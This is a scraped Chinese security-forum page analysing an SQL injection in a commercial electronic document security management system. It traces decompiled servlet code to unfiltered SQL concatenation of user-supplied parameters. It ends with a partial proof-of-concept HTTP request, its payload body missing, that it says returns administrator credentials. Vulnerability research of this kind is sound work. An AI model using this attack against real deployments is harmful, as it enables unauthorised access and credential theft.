2yGjBPB4XY75CKmRCDZlVkitWcJybarx4LkbnITAR6zl2TJ4ZbG27PZ9nF8qchfkvHlcXwOza0DuP4uviYuFDxChzAozAfIEoMkRAzGEBkkmTRAkCIz4EbAn81lE8mEwYiPAwhmwuDh3ZGAR/5AiBgdcDNpNIRIjhJdU2aaranRNTCUlOjYyMgYvdb5qU2bjtR7l69e++XcrFuuW0gkeu7SpfvOeSM02k+Cb2R7t2z95dpV7vmLf3qswfeK3RKzk2JwmjWY6TA2Bdw9EcgDcgptutIo7tpwzv3t8a6l7ea5VyxaeqFRPyZ/840g6R8NvbH7p4vnu1et/eXWLb1jvoZvYx8KRqjnSXGvOCJYBL8wJGwQzhMuFq6G2mZ6E9gDaRhlUWMmzS6bSbonRI0iVD4C9RQTgzQdywxSfyAb4IcQbcbadmCXxTKJGSQWNbSQCLR
|
|||
|
|
<style>@-moz-keyframes blink{50%{background-color:transparent}}@-webkit-keyframes blink{50%{background-color:transparent}}@keyframes blink{50%{background-color:transparent}}@media print{}pre code.hljs{overflow-x:auto}.hljs{color:#000}.hljs-comment{color:green}.hljs-built_in,.hljs-keyword{color:#00f}.hljs-literal,.hljs-string{color:#a31515}.markdown-body{color-scheme:light;--color-prettylights-syntax-comment:#6e7781;--color-prettylights-syntax-constant:#0550ae;--color-prettylights-syntax-entity:#8250df;--color-prettylights-syntax-storage-modifier-import:#24292f;--color-prettylights-syntax-entity-tag:#116329;--color-prettylights-syntax-keyword:#cf222e;--color-prettylights-syntax-string:#0a3069;--color-prettylights-syntax-variable:#953800;--color-prettylights-syntax-brackethighlighter-unmatched:#82071e;--color-prettylights-syntax-invalid-illegal-text:#f6f8fa;--color-prettylights-syntax-invalid-illegal-bg:#82071e;--color-prettylights-syntax-carriage-return-text:#f6f8fa;--color-prettylights-syntax-carriage-return-bg:#cf222e;--color-prettylights-syntax-string-regexp:#116329;--color-prettylights-syntax-markup-list:#3b2300;--color-prettylights-syntax-markup-heading:#0550ae;--color-prettylights-syntax-markup-italic:#24292f;--color-prettylights-syntax-markup-bold:#24292f;--color-prettylights-syntax-markup-deleted-text:#82071e;--color-prettylights-syntax-markup-deleted-bg:#FFEBE9;--color-prettylights-syntax-markup-inserted-text:#116329;--color-prettylights-syntax-markup-inserted-bg:#dafbe1;--color-prettylights-syntax-markup-changed-text:#953800;--color-prettylights-syntax-markup-changed-bg:#ffd8b5;--color-prettylights-syntax-markup-ignored-text:#eaeef2;--color-prettylights-syntax-markup-ignored-bg:#0550ae;--color-prettylights-syntax-meta-diff-range:#8250df;--color-prettylights-syntax-brackethighlighter-angle:#57606a;--color-prettylights-syntax-sublimelinter-gutter-mark:#8c959f;--color-prettylights-syntax-constant-other-reference-link:#0a3069;--color-fg-default:#24292f;--color-fg-muted:#57606a;--color-fg-subtle:#6e7781;--color-canvas-default:#ffffff;--color-canvas-subtle:#f6f8fa;--color-border-default:#d0d7de;--color-border-muted:hsl(210,18%,87%);--color-neutral-muted:rgba(175,184,193,0.2);--color-accent-fg:#0969da;--color-accent-emphasis:#0969da;--color-attention-subtle:#fff8c5;--color-danger-fg:#cf222e}.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;margin:0;color:var(--color-fg-default);background-color:var(--color-canvas-default);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji";font-size:16px;line-height:1.5;word-wrap:break-word}.markdown-body a{background-color:transparent;color:var(--color-accent-fg);text-decoration:none}.markdown-body a:active,.markdown-body a:hover{outline-width:0}.markdown-body strong{font-weight:600}.markdown-body img{border-style:none;max-width:100%;-webkit-box-sizing:content-box;box-sizing:content-box;background-color:var(--color-canvas-default)}.markdown-body ::-webkit-input-placeholder{color:inherit;opacity:0.54}.markdown-body ::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}.markdown-body a:hover{text-decoration:underline}.markdown-body h2,.markdown-body h3{margin-top:24px;margin-bottom:16px;line-height:1.25}.markdown-body h2{font-weight:600;padding-bottom:0.3em;font-size:1.5em;border-bottom:1px solid var(--color-border-muted)}.markdown-body h3{font-weight:600;font-size:1.25em}.markdown-body ol{padding-left:2em}.markdown-body code{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace}.markdown-body pre{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace;word-wrap:normal}.markdown-body ::-webkit-input-placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body ::placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body::before{display:table;content:""}.markdown-body::after{display:table;clear:both;content:""}.markdown-body>*:first-child{margin-top:0!important}.markdown-body>*:last-child{margin-bottom:0!imp
|
|||
|
|
<style>#md_view{padding:0 20px}#md_view img:hover{cursor:pointer}</style>
|
|||
|
|
<!--[if lt IE 9]>
|
|||
|
|
<script src="/static/js/html5shiv.min.js"></script>
|
|||
|
|
<script src="/static/js/respond.min.js"></script>
|
|||
|
|
<![endif]-->
|
|||
|
|
<style>.hot{z-index:10}</style>
|
|||
|
|
<style>html #layuicss-skinlayercss{display:none;position:absolute;width:1989px}@-webkit-keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);-ms-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1)}}@-webkit-keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);-ms-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);-ms-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);-ms-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);-ms-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);-ms-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);transform:translateX(10px)}}@keyframes shake{0%,100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);-ms-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);-ms-transform:translateX(10px);transform:translateX(10px)}}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);transform:scale(.7)}30%{-webkit-transform:scale(1.05);transform:scale(1.05)}0%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.
|
|||
|
|
* Waves v0.7.5
|
|||
|
|
* http://fian.my.id/Waves
|
|||
|
|
*
|
|||
|
|
* Copyright 2014-2016 Alfiana E. Sibuea and other contributors
|
|||
|
|
* Released under the MIT license
|
|||
|
|
* https://github.com/fians/Waves/blob/master/LICENSE
|
|||
|
|
*/</style><style>@media (max-height:620px){}@media (max-height:783px){}@-webkit-keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}@keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}</style><style>@-webkit-keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@media (pointer:coarse){}</style><style>:root{--sr-annote-color-0:#b4d9fb;--sr-annote-color-1:#ffeb3b;--sr-annote-color-2:#a2e9f2;--sr-annote-color-3:#a1e0ff;--sr-annote-color-4:#a8ea68;--sr-annote-color-5:#ffb7da}</style><style>@-webkit-keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@-webkit-keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes fadeOut{0%{opacity:1}to{opacity:0}}@keyframes fadeOut{0%{opacity:1}to{opacity:0}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:tra
|
|||
|
|
<body>
|
|||
|
|
<div class="global-nav mb-50">
|
|||
|
|
<nav class="navbar navbar-inverse navbar-fixed-top">
|
|||
|
|
<div class="container nav">
|
|||
|
|
<div class="visible-xs header-response sf-hidden">
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
<div class="row hidden-xs">
|
|||
|
|
<div class="col-sm-9 col-md-9 col-lg-9">
|
|||
|
|
<div class=navbar-header>
|
|||
|
|
<button type=button class="navbar-toggle collapsed sf-hidden" data-toggle=collapse data-target=#global-navbar>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
</button>
|
|||
|
|
<div class=logo><a class="navbar-brand logo" href=https://forum.butian.net/></a></div>
|
|||
|
|
</div>
|
|||
|
|
<div class="collapse navbar-collapse" id=global-navbar>
|
|||
|
|
<ul class="nav navbar-nav">
|
|||
|
|
<li><a href=https://forum.butian.net/>首页 <span class=sr-only>(current)</span></a></li>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<li><a href=https://forum.butian.net/questions>问答</a></li>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<li><a href=https://forum.butian.net/shop>商城</a></li>
|
|||
|
|
|
|||
|
|
<li><a href=https://forum.butian.net/community>实战攻防技术</a></li>
|
|||
|
|
<li><a href=https://forum.butian.net/articles>漏洞分析与复现</a>
|
|||
|
|
<span class=hot>NEW</span>
|
|||
|
|
</li>
|
|||
|
|
<li><a href=https://forum.butian.net/movable>活动</a></li>
|
|||
|
|
<li><a href=https://forum.butian.net/questions/Play>摸鱼办</a>
|
|||
|
|
|
|||
|
|
</li>
|
|||
|
|
</ul>
|
|||
|
|
<form role=search id=top-search-form action=https://forum.butian.net/search method=GET class="navbar-form hidden-sm hidden-xs pull-right">
|
|||
|
|
<span class="btn btn-link"><span class=sr-only>搜索</span><span class="glyphicon glyphicon-search"></span></span>
|
|||
|
|
<input type=text name=word id=searchBox class=form-control placeholder value>
|
|||
|
|
</form>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</nav>
|
|||
|
|
</div>
|
|||
|
|
<div class="top-alert mt-60 clearfix text-center">
|
|||
|
|
<!--[if lt IE 9]>
|
|||
|
|
<div class="alert alert-danger topframe" role="alert">你的浏览器实在<strong>太太太太太太旧了</strong>,放学别走,升级完浏览器再说
|
|||
|
|
<a target="_blank" class="alert-link" href="http://browsehappy.com">立即升级</a>
|
|||
|
|
</div>
|
|||
|
|
<![endif]-->
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
<div class=wrap>
|
|||
|
|
<div class=container>
|
|||
|
|
<div class="row mt-10">
|
|||
|
|
<div class="col-xs-12 col-md-9 main" style=width:100%>
|
|||
|
|
<div class=widget-article>
|
|||
|
|
<h3 class="title word-wrap">某通电子文档安全管理系统SQL注入漏洞 代码分析</h3>
|
|||
|
|
<ul class=taglist-inline>
|
|||
|
|
<li class=tagPopup><a class=tag href=https://forum.butian.net/topic/48>漏洞分析</a></li>
|
|||
|
|
</ul>
|
|||
|
|
<div class="content mt-10">
|
|||
|
|
<div class="quote mb-20">
|
|||
|
|
某通电子文档安全管理系统SQL注入漏洞 代码分析
|
|||
|
|
</div>
|
|||
|
|
<textarea id=md_view_content style=display:none value='影响版本
|
|||
|
|
----
|
|||
|
|
|
|||
|
|
V5.6.3.152.186 20240811之前
|
|||
|
|
|
|||
|
|
产品简介
|
|||
|
|
----
|
|||
|
|
|
|||
|
|
某通电子文档安全管理系统是一款综合性的数据智能安全产品,涵盖了透明加密、数据分类分级、访问控制等多项核心技术。该系统保护范围广泛,包括终端电脑、智能终端以及各类应用系统,能有效防止数据泄露,满足数据安全合规要求。该系统采用事前主动防御、事中实时控制、事后及时追踪的设计理念,全方位保障用户终端数据安全。
|
|||
|
|
|
|||
|
|
代码分析
|
|||
|
|
----
|
|||
|
|
|
|||
|
|
首先进入`WEB-INF`的web.xml页面中,`Fn+F`搜索`CDGAuthoriseTempletService1`
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
`Ctrl`点击键入该类中,该类位于`com/esafenet/servlet/service/document/CDGAuthoriseTempletService1.class`中,这个是一个servlet文件,找到与前端交互的方法即`service`方法
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
对该代码分析如下
|
|||
|
|
|
|||
|
|
```php
|
|||
|
|
protected void service(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
|
|||
|
|
response.setContentType("text/html");
|
|||
|
|
ServiceUtil.XMLInit(this.xStream);//调用一个工具类,用于初始化初始化xstream对象,用于XML序列化和反序列化
|
|||
|
|
CDGAuthoriseTemplet caTempl \= new CDGAuthoriseTemplet();//可能是一个数据访问对象(DAO)
|
|||
|
|
String toServerXML \= ServiceUtil.getXMLFromRequest(request);//获取请求中的xml字符串
|
|||
|
|
GetCDGAuthoriseTemplet gcat \= (GetCDGAuthoriseTemplet)this.xStream.fromXML(toServerXML);//将XML字符串反序列化为GetCDGAuthoriseTemplet类型的对象gcat
|
|||
|
|
boolean flag \= this.validateInfo(gcat);//对反序列化的内容进行校验
|
|||
|
|
if (!flag) {//校验结果为false,直接进行gcat序列化为xml发送响应
|
|||
|
|
ServiceUtil.sendInfo(request, response, this.xStream.toXML(gcat));
|
|||
|
|
} else {
|
|||
|
|
CDGAuthoriseTempletModel model \= new CDGAuthoriseTempletModel();
|
|||
|
|
|
|||
|
|
try {
|
|||
|
|
caTempl \= model.getAuthoriseTempletList(caTempl, gcat.getUserId(), gcat.getSecretLevelId());//取授权模板列表
|
|||
|
|
ServiceUtil.sendInfo(request, response, this.xStream.toXML(caTempl));//将结果(即caTempl对象)的XML表示发送给客户端。
|
|||
|
|
} catch (Exception var9) {
|
|||
|
|
Exception e \= var9;
|
|||
|
|
e.printStackTrace();
|
|||
|
|
gcat.setReturnMessage("error099");
|
|||
|
|
ServiceUtil.sendInfo(request, response, this.xStream.toXML(gcat));
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
**分析**:上述代码就是接受前端的请求数据,数据类型为xml,将其进行xml反序列之后进行校验,进行校验成功之后调用`getAuthoriseTempletList`方法,之后将内容进行序列化返回给前端
|
|||
|
|
|
|||
|
|
我们先分析一下这个校验即`this.validateInfo(gcat);`
|
|||
|
|
|
|||
|
|
```php
|
|||
|
|
private boolean validateInfo(GetCDGAuthoriseTemplet gcat) {
|
|||
|
|
String userId \= gcat.getUserId();
|
|||
|
|
String secretLevelId \= gcat.getSecretLevelId();
|
|||
|
|
if (userId != null && !"".equals(userId)) {
|
|||
|
|
if (secretLevelId != null && !"".equals(secretLevelId)) {
|
|||
|
|
try {
|
|||
|
|
User localUser \= this.userDao.findUserById(userId);
|
|||
|
|
if (localUser \== null) {
|
|||
|
|
gcat.setReturnMessage("error007");
|
|||
|
|
return false;
|
|||
|
|
} else {
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
} catch (Exception var5) {
|
|||
|
|
gcat.setReturnMessage("error104");
|
|||
|
|
return false;
|
|||
|
|
}
|
|||
|
|
} else {
|
|||
|
|
gcat.setReturnMessage("error112");
|
|||
|
|
return false;
|
|||
|
|
}
|
|||
|
|
} else {
|
|||
|
|
gcat.setReturnMessage("error101");
|
|||
|
|
return false;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
上述代码就是先判断序列化之后的内容中`userId`以及`secretLevelId`是否为空,不为空则进行`findUserById`操作,`Ctrl`点击跟进该方法
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
**分析**:绿框中的内容对userid的内容转换为小写,尝试从缓存(usermap)中获取用户信息,找到将结果返回
|
|||
|
|
|
|||
|
|
蓝框中的内容就是去数据库中查找是否有该`userId`,若有则将结果返回
|
|||
|
|
|
|||
|
|
分析完这个校验之后,接着进入到校验成功之后else语句中即如图代码中
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
**分析**:调用了`model.getAuthoriseTempletList`方法进行模板列表的更新,之后进行序列化并将结果返回给前端
|
|||
|
|
|
|||
|
|
`Ctrl`点击进入到`getAuthoriseTempletList`方法中
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
它又调用了`List<AuthoriseTemplet>`下的`getAuthoriseTempletList`方法,我们继续跟进
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
**分析**:调用 `this.getAuthoriseTempletList(userId, secretLevelId)` 方法来获取与指定用户和密级相关的 `CDGAuthoriseTempletInfo` 对象列表其中包含包括名称(`name`)、描述(`description`)、密级(`secretLevel`)、创建日期(`createDate`)。然后创建一个空的 `ArrayList` 类型的 `authoriseTempletList`,用于存储转换后的 `AuthoriseTemplet` 对象,将获取到的对象列表中的内容给到`AuthoriseTemplet` 对象之后返回这个对象
|
|||
|
|
|
|||
|
|
我们进入到`getAuthoriseTempletList`方法中查看它是如何获取对象列表的
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
**分析**:该方法就是判断我们传递的`userId`、 `secretLevelId`是否为空,若不为空就将其拼接到sql语句中(猜测这就是sql注入漏洞形成的原因),之后调用`dao.getAuthoriseTempletList(sqls.toString())`将其结果返回
|
|||
|
|
|
|||
|
|
进入到`List<CDGAuthoriseTempletInfo>`下的`getAuthoriseTempletList`方法中,这里见我们转入的参数进行了sql语句的拼接后,调用了`dao.getAuthoriseTempletList`方法,这里有多个地方声明了该方法我们选择的是第一个
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
**分析**:该方法会将我们传入的参数直接拼接到sql语句中即(`sql.append(condtion)`),之后进行调用`getCommonResults(sql.toString())`方法执行sql语句的查询(并且没有任何过滤)并将结果赋值给maps,之后就是判断maps是否为空,将maps中的内容赋值给list,返回list。
|
|||
|
|
|
|||
|
|
总结
|
|||
|
|
--
|
|||
|
|
|
|||
|
|
经过以上分析我们已经确定了该漏洞的成因,
|
|||
|
|
|
|||
|
|
1. `CDGAuthoriseTempletModel`下的`getAuthoriseTempletList`方法---&gt;`List<AuthoriseTemplet>下的 getAuthoriseTempletList`方法,其中的参数就是我们可以控制的由前端传过来`UserId`和`SecretLevelId`
|
|||
|
|
2. `List<AuthoriseTemplet>下的 getAuthoriseTempletList`方法--&gt;`List<CDGAuthoriseTempletInfo>`下的`getAuthoriseTempletList`方法,通过`sqls.append`将我们可以控制的参数进行sql语句的拼接
|
|||
|
|
3. `List<CDGAuthoriseTempletInfo>`下的`getAuthoriseTempletList`方法--&gt;`dao.getAuthoriseTempletList(sqls.toString())`只进行`getCommonResults`进而执行sql语句并将结果返回
|
|||
|
|
|
|||
|
|
因此只要我们在前端传入的参数`UserId`是缓存中的内容或者是数据库中的存在的值进而绕过`validateInfo`的if校验,进入到else语句中,之后`SecretLevelId`传入我们恶意的sql语句,进入`getAuthoriseTempletList`方法中进行sql语句的执行,这样从而将我们想要的数据以xml的格式返回到响应中
|
|||
|
|
|
|||
|
|
### 然后我们进行构造POC
|
|||
|
|
|
|||
|
|
电子文档安全管理系统(CDG)
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
然后用加解密工具去加密
|
|||
|
|
|
|||
|
|
<https://github.com/wafinfo/DecryptTools>
|
|||
|
|
|
|||
|
|
|
|||
|
|
发送 POC 可直接获取到管理员账户密码。
|
|||
|
|
|
|||
|
|
```php
|
|||
|
|
POST /CDGServer3/CDGAuthoriseTempletService1 HTTP/1.1
|
|||
|
|
|
|||
|
|
Host:
|
|||
|
|
|
|||
|
|
Cache-Control: max-age=0
|
|||
|
|
|
|||
|
|
Sec-Ch-Ua: "Not:A-Brand";v="99", "Chromium";v="112"
|
|||
|
|
|
|||
|
|
Sec-Ch-Ua-Mobile: ?0
|
|||
|
|
|
|||
|
|
Sec-Ch-Ua-Platform: "Windows"
|
|||
|
|
|
|||
|
|
Upgrade-Insecure-Requests: 1
|
|||
|
|
|
|||
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
|
|||
|
|
|
|||
|
|
Gecko) Chrome/112.0.5615.138 Safari/537.36
|
|||
|
|
|
|||
|
|
Accept:
|
|||
|
|
|
|||
|
|
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*
|
|||
|
|
|
|||
|
|
/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
|||
|
|
|
|||
|
|
Sec-Fetch-Site: none
|
|||
|
|
|
|||
|
|
Sec-Fetch-Mode: navigate
|
|||
|
|
|
|||
|
|
Sec-Fetch-User: ?1
|
|||
|
|
|
|||
|
|
Sec-Fetch-Dest: document
|
|||
|
|
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
|
|||
|
|
Accept-Language: zh-CN,zh;q=0.9
|
|||
|
|
|
|||
|
|
Connection: close
|
|||
|
|
|
|||
|
|
Content-Type: application/xml
|
|||
|
|
|
|||
|
|
Content-Length: 510
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
加密数据
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
最后将返回的结果进行解密,可看到账户密码信息
|
|||
|
|
|
|||
|
|
'>影响版本
|
|||
|
|
----
|
|||
|
|
|
|||
|
|
V5.6.3.152.186 20240811之前
|
|||
|
|
|
|||
|
|
产品简介
|
|||
|
|
----
|
|||
|
|
|
|||
|
|
某通电子文档安全管理系统是一款综合性的数据智能安全产品,涵盖了透明加密、数据分类分级、访问控制等多项核心技术。该系统保护范围广泛,包括终端电脑、智能终端以及各类应用系统,能有效防止数据泄露,满足数据安全合规要求。该系统采用事前主动防御、事中实时控制、事后及时追踪的设计理念,全方位保障用户终端数据安全。
|
|||
|
|
|
|||
|
|
代码分析
|
|||
|
|
----
|
|||
|
|
|
|||
|
|
首先进入`WEB-INF`的web.xml页面中,`Fn+F`搜索`CDGAuthoriseTempletService1`
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
`Ctrl`点击键入该类中,该类位于`com/esafenet/servlet/service/document/CDGAuthoriseTempletService1.class`中,这个是一个servlet文件,找到与前端交互的方法即`service`方法
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
对该代码分析如下
|
|||
|
|
|
|||
|
|
```php
|
|||
|
|
protected void service(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
|
|||
|
|
response.setContentType("text/html");
|
|||
|
|
ServiceUtil.XMLInit(this.xStream);//调用一个工具类,用于初始化初始化xstream对象,用于XML序列化和反序列化
|
|||
|
|
CDGAuthoriseTemplet caTempl \= new CDGAuthoriseTemplet();//可能是一个数据访问对象(DAO)
|
|||
|
|
String toServerXML \= ServiceUtil.getXMLFromRequest(request);//获取请求中的xml字符串
|
|||
|
|
GetCDGAuthoriseTemplet gcat \= (GetCDGAuthoriseTemplet)this.xStream.fromXML(toServerXML);//将XML字符串反序列化为GetCDGAuthoriseTemplet类型的对象gcat
|
|||
|
|
boolean flag \= this.validateInfo(gcat);//对反序列化的内容进行校验
|
|||
|
|
if (!flag) {//校验结果为false,直接进行gcat序列化为xml发送响应
|
|||
|
|
ServiceUtil.sendInfo(request, response, this.xStream.toXML(gcat));
|
|||
|
|
} else {
|
|||
|
|
CDGAuthoriseTempletModel model \= new CDGAuthoriseTempletModel();
|
|||
|
|
|
|||
|
|
try {
|
|||
|
|
caTempl \= model.getAuthoriseTempletList(caTempl, gcat.getUserId(), gcat.getSecretLevelId());//取授权模板列表
|
|||
|
|
ServiceUtil.sendInfo(request, response, this.xStream.toXML(caTempl));//将结果(即caTempl对象)的XML表示发送给客户端。
|
|||
|
|
} catch (Exception var9) {
|
|||
|
|
Exception e \= var9;
|
|||
|
|
e.printStackTrace();
|
|||
|
|
gcat.setReturnMessage("error099");
|
|||
|
|
